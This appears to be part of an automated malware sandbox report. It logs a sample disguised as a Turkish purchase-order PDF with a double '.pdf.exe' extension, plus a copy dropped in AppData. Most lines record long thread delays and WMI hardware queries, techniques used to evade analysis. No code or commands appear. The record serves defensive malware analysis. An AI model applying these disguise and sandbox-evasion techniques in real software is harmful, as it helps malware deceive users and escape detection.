Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398560s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398453s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398343s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398218s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398109s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2398000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397890s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397781s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397672s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397562s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397452s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397343s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397234s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397125s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2397015s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396906s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396797s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396684s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396577s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396468s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396359s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396244s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396133s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2396031s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395922s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395812s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395703s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395593s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395484s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395375s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395265s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395156s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2395047s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2394937s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2394828s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2394718s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2394609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2394500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7860 Thread sleep time: -2394390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7972 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2400000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8092 Thread sleep count: 2572 > 30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2399890s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8092 Thread sleep count: 7283 > 30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2399778s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2399656s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2399484s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2399349s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2399224s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2399094s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398984s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398875s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398747s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398625s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398516s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398391s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398266s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398156s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2398047s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397937s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397828s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397500s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397390s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397281s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2397052s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396922s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396812s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396703s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396594s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396469s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396359s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396250s >= -30000s
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088 Thread sleep time: -2396141s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2396031s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395922s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395265s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2395042s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394825s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394718s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394541s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 8088Thread sleep time: -2394218s >= -30000s
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2400000
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399875
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399765
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399656
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399531
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399421
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399312
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399195
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2399093
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398984
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398874
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398765
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398653
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398543
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398432
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398328
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398188
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2398015
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397906
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397796
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397687
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397578
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397468
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397359
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397250
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397140
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2397031
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396922
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396810
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396703
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396594
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396484
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396375
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396265
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396156
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2396046
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395937
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395827
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395714
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395587
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395465
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395358
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395250
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395140
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2395031
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2394922
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2394812
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2394703
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2394593
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2394483
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Thread delayed: delay time: 2394375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399843
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399734
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399515
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399406
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399296
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399187
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399076
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398968
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398859
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398747
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398560
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398453
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398343
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398218
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398109
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397781
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397672
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397562
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397452
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397343
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397234
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397125
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397015
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396906
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396797
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396684
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396577
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396468
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396359
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396244
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396133
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396031
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395593
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395265
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394718
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394390
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399778
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399349
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399224
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399094
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398747
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398156
